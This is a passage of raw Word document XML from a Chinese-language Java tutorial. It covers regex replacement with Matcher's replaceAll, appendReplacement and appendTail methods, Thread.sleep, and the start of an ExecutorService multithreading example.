        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import java.util.regex.Pattern;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0EA9B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C91421E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class RegexMatches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA2701B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B3BBB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    private static String REGEX = "dog";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7735115A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    private static String INPUT = "The dog says meow. " +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E79A89" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                    "All dogs say meow.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552068E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    private static String REPLACE = "cat";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5764B49D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D71D74E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235DB73C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Pattern p = Pattern.compile(REGEX);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4B41DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       // get a matcher object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2A25DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Matcher m = p.matcher(INPUT); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFB1E59" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>INPUT = m.replaceAll(REPLACE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC8035D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       System.out.println(INPUT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A35E81E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41169EDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD96791" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>appendReplacement</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>appendTail</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E66F300" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Matcher </w:t>
      </w:r>
      <w:r>
        <w:t>类也提供了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">appendReplacement </w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> appendTail </w:t>
      </w:r>
      <w:r>
        <w:t>方法用于文本替换：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E853239" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import java.util.regex.Matcher;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E48BD9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import java.util.regex.Pattern;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D5E72F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7112F0BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class RegexMatches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAA1D08" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F28B9B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   private static String REGEX = "a*b";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3869540F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   private static String INPUT = "aabfooaabfooabfoobkkk";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCA8E3A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   private static String REPLACE = "-";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BF2B8C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F689F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Pattern p = Pattern.compile(REGEX);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5117254A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> matcher </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFE64F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Matcher m = p.matcher(INPUT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D736251" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      StringBuffer sb = new StringBuffer();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8FA581" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      while(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m.find()</w:t>
      </w:r>
      <w:r>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CD04CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m.appendReplacement(sb,REPLACE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3E1C7D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD7D674" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m.appendTail(sb);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4B0179" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      System.out.println(sb.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8456EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F077F03" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA089C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D28284" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70E5D904" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CC37134" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30DAB062" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50AD66EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2752B5AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B10289B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="727" w:name="_Toc159780156"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Thread.sleep:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程休眠</w:t>
      </w:r>
      <w:bookmarkEnd w:id="727"/>
    </w:p>
    <w:p w14:paraId="25F280BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sleep()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>当前线程进入停滞状态（阻塞当前线程），让出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、目的是不让当前线程独自霸占该进程所获的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资源，以留一定时间给其他线程执行的机会。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63411ECF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5447D0BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以让程序休眠一毫秒的时间或者到您的计算机的寿命长的任意段时间。例如，下面的程序会休眠</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>秒：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621F4E21" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66052AAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public class SleepDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F42C46D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F766F6C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      try { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9D7CBE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         System.out.println(new Date( ) + "\n"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC75E44" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Thread.sleep(1000*3);   // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>休眠</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>秒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347816FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         System.out.println(new Date( ) + "\n"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E16E244" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      } catch (Exception e) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF33C4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          System.out.println("Got an exception!"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645CF12B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9CFC59" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D89DA98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C93C126" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F92B51" w14:textId="063F3FC2" w:rsidR="00AE51E5" w:rsidRDefault="00AE51E5" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="728" w:name="_Toc159780157"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>xecutorService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多线程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="728"/>
    </w:p>
    <w:p w14:paraId="101109DB" w14:textId="77777777" w:rsidR="00AE51E5" w:rsidRDefault="00AE51E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B68E42B" w14:textId="77777777" w:rsidR="00AE51E5" w:rsidRDefault="00AE51E5" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292A2F"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public static void </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="41A1C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">[] args) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">throws </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Exception </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
